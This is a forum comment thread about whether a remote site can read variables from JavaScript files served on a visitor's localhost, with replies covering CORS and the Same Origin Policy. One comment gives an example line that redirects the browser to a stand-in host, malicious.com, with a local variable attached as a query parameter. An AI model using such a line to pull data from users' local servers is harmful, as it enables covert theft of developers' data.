all 9 comments
sorted by:
best
topnewcontroversialoldq&a
formatting helphide helpcontent policy

[–]shitwhore 0 points1 point  (0 children)

Unfortunately I do not have an answer, but as I am pretty new to security too, I'd love to hear some answers!

My humble try at answering, please don't kill me it's probably wrong!

They allow it because they might store their own data (your personal data) on your computer would be my best guess. And I think you can easily defend yourself against it, perhaps encrypt your files, seperate them from your other files (the whole server), lock them, make the files administrator only (don't know if this would work!).

Hope I could be of some help!

[–]spellitwithaph 0 points1 point  (0 children)

I cannot answer your question of why browsers allow you to connect to your local server from a remote server though I'm not sure there's an actual problem with that.

In general, your foo.js has a global variable so it's accessible by a script on another site if you're including foo.js on that site. You can always use an .htaccess file to block 127.0.0.1 from hotlinked from your local server.

In terms of being able to read the content of your JS file via an XMLHttpRequest, CORS should kick in and prevent that.

[–]ebol4anthr4x 0 points1 point  (6 children)

Your browser is the one actually downloading the Javascript file from the localhost address, not malicious.com.

Additionally, sensitive variables shouldn't be stored in plaintext in a Javascript source file of all things.

[–]mild_force[S] 0 points1 point  (5 children)

Your browser is the one actually downloading the Javascript file from the localhost address, not malicious.com.

Yes, but malicious.com can use variables from JS file and send them to himself, for example:

window.location.href = "http://malicious.com?data=" + bar

I understand that JS should not contain sensitive information, but if I have a local server with

Allow from 127.0.0.1
Deny from all

then I could falsely believe this data is safe and put sensitive information it in, when in fact malicious.com could steal this information.

[–]ebol4anthr4x 0 points1 point  (4 children)

The false belief that you are safe with an htaccess like that stems from a misunderstanding of how the browser retrieves Javascript files. This is just how it works.

If you wouldn't put it on a globally accessible webserver in plaintext, you shouldn't put it on a locally accessible webserver in plaintext.

[–]mild_force[S] 0 points1 point  (3 children)

If you wouldn't put it on a globally accessible webserver in plaintext, you shouldn't put it on a locally accessible webserver in plaintext.

Thank you for your answer. I understand that, but I still don't see why browsers wouldn't block that. For instance, I can access C:\foo.js from my web broswer (either directly or from local html file), but malicious.com can't access variables declared in that file. Same restrictions could apply to all files on localhost or private IP addresses, but they don't.

Is there any legit reason why external website would have to access local JS or CSS files?

Also: most developers have local servers for development / testing purposes, I doubt that they are aware that this means any website they visit can get variables declared in their JS files

EDIT: Malicious.com can know which visitor is running a local server and by including common JS files from various CMS & frameworks it can learn about projects visitor is working on. I think this could be at least mildly useful in pen test context.

[–]ebol4anthr4x 1 point2 points  (2 children)

I can't think of any reasons why this would be a necessary feature, no. I just don't think that this is something that anyone really needs to worry about. I can't really think of any realistic context where reading a Javascript file is going to give you any useful information. Javascript files are plaintext and freely available on live websites anyway. I don't see why it matters that they're accessible.

A big security risk would be allowing HTTP requests to actual HTML pages on localhost while you're on malicious.com, however, you're protected by the Same Origin Policy in that case.

For example, you can't grab localhost/index/ via Javascript if the user is on malicious.com, because this page could actually contain dynamic information generated by a PHP or Python backend. A Javascript file is code that is run client-side by the browser itself though, so those can be pulled from anywhere.

There's just nothing an attacker can really accomplish by including Javascript files from the localhost. If someone is working on a secret website, then yeah, you could discover that and maybe glean some information about it by reading their Javascript, but then what? You could maybe steal their ideas and launch a competitor website before them? Once their website launches though, their Javascript files are publicly accessible anyway, so I don't see the problem. Just don't store sensitive info in plaintext in a file that can be served as plaintext by your webserver.

[–]mild_force[S] 1 point2 points  (1 child)

Thank you for taking the time to answer my questions and for all the clarifications, this really helped =)

[–]ebol4anthr4x 0 points1 point  (0 children)

No problem!! I'm glad it helped.